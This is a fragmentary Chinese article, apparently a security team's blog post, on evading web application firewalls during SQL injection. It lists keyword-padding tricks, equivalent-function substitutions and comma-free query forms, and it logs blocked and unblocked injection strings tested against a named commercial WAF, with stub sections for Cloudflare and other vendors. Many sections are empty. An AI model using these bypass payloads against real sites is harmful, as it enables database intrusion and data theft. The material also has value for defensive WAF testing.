SQL_ByPassWaf

WAF绕过之SQL注入（?归来）

?

Author:?ystart

Team:?ms509

Date:2020/5

前言：

?

?

正文：

老树：

这一部分是SQL语法功能技巧的总结，也是WAF绕过的基础。

注释：

?

功能特性：

selectCHAR

SQL?查询语句select后面可以接一些特殊字符，这些字符与select相结合可以达到绕过waf目的，除了?select?语句之外?union\from等关键字前后也可以连接一些特殊字符，这些关键子前后就可以作为fuzz 的点。

【?+?】号：

【-?】号：

【@】号：

【！】号：

【?‘?】号：

【?“?】号：

【?~?】号：

【{】号：

当然除以上字符，也可结合注释符--?、/*、空白字符等。

不仅仅mysql有这类的语法特性，?mssql?、oracle同样支持，这里就不一一介绍大家可以自行fuzz尝试

● ????Oracle11:

???MSSQL?:

等价替换：

waf会对一些常见的攻击语句进行拦截，这个时候我们不一定非得正面硬杠，可以挖掘寻找一些生僻的?具有相同功能的语句进行代替替换，这也是绕waf的常用手段。以下部分是对SQL查询表达式、函数等??其他查询语句等价功能的一个总结，有些来自互联网，有些是自己的研究。

???函数替换

截取字符串是SQL注入利用技术里面的常用功能，通常使用mid(string,1,1)

|substr(user()?from?1?for?1);|

|replace(LPAD(user(),2,1),LPAD(user(),2-1,1),"");|

|LPAD(REVERSE(TRIM(?lpad(user(),1,SPACE(1))?)),1,SPACE(1);|

ascii(c)?、ord(c) <=> conv(hex(c),16,10)

对于函数过滤的情况可以通过官方文档所有API函数，使用index.php?id=1 xor?user()进行fuzz,以下是?百度云?fuzz的结果

?

???逗号过滤

有时候逗号也会被waf拦截或过滤，可以通过不含引号的SQL语句代替

case?when?代替if

union?select?1,2,3?<=>

union?select?*?from?(select?1)a?join?(select?2)b?join?(select?3)c

limit?2,1?<=>limit?1?o?set?2

???比较表达式代替

【?=?】

if(abs(strcmp((ascii(mid(user()from(1)for(2)))),114))-1,1,0)

?nd_in_set()

regexp

【<,>】

least(ord('r'),115)?、greatest(ord('r'),113)

between?n?and?m

核心：

?

这部分内容是本文的核心部分，在我看来是文章的灵魂吧，除了技巧方法外，还有一些思想指导，waf?绕过技术不同于一般的技术思考方向至关重要，有些技巧大部分人可能都已经掌握了但真正给一款waf摆在 面前，能突破防御的怕是少之有少。该技术是一个比较大比较复杂的范畴，参数污染、畸形请求包、chunk?分割、编码解码等方法林林总总，这些都是老生常谈的东西适用一定的条件、场合，普适性不强，所以这方?面内容本文不会涉及，我们要和waf这只老虎来个正面较量，相信会给大家带来惊喜和收益。

?

目标：

1.主要目标：绕过【SELECT?col?FORM?table】语句拦截

2.次要目标：绕过【UNION?SELECT】语句拦截

战略：

?

实战：

该小节依据上文战略思想，以真实案例来推演整个绕过过程。

目标：?百度云加速-CDN、网站攻击防护、SEO优化工具

1.本地FUZZ?PAYLOAD

2.关键字前后填充字符测试

3.构造正确的绕过PAYLOAD

???本地FUZZ?PAYLOAD

FUZZ?字符除了【0-255】全字符外，也可以添加自己收集的一些tricks进行FUZZ?{FUZZ}UNION?SELECT?fuzz的一些结果

???关键字前后填充字符测试

UNION?SELECT?绕过尝试

id=1 xor?xxunion?selectxx?拦截

id=1 xor?xxunionxxselectxx??不拦截

id=1 xor?union(select??不拦截

id=1 xor?union(select)?拦截

id=1 xor?union?dd(select)??不拦截

SELET?FROM?绕过测试

id=1 xor?s(select?xxfrom?xx)??拦截

id=1 xor?s(select?xx?from?b?xx)??不拦截

id=1 xor?s(select?xx?fromxx)拦截

id=1 xor?s(select@afrom?xx) 拦截

id=1 xor?s(select@asfrom?xx) 不拦截

通过以上测试把union?select?from?结合在一起并不拦截

百度云加速-套餐版本介绍?xor?union?dd(select@ \Nfrom?xx)

看来成功不远了，接下来构造出正确的SQL语句，发现会被拦截

???构造正确的绕过PAYLOAD

这一步就是构造一个既能绕过WAF防御也能正确执行的SQL?PAYLOAD

首先在union前面添加我们fuzz的.1字符，不拦截，这就是一个完全绕过payload，百度云加速防?护能力相对来说偏弱一些，绕过花费不了太多时间。

对于SQL注入漏洞利用，有些场合需要用到盲注，盲注当然离不开SQL?API的，里面一些常用的函?数也会成为WAF照顾的对象，我们可以在函数名前后添加一些特殊字符或注释进行绕过

?

?

新花：

?

CloudFlare绕过：

cloud?are使用MSSQL?PAYLOAD进行测试

UNION?SELECT?绕过

SELECT?FROM?绕过

MYSQL?报错注入绕过

安全狗绕过：

云锁绕过：

阿里云绕过：

?

?

利用：

Tamper样例：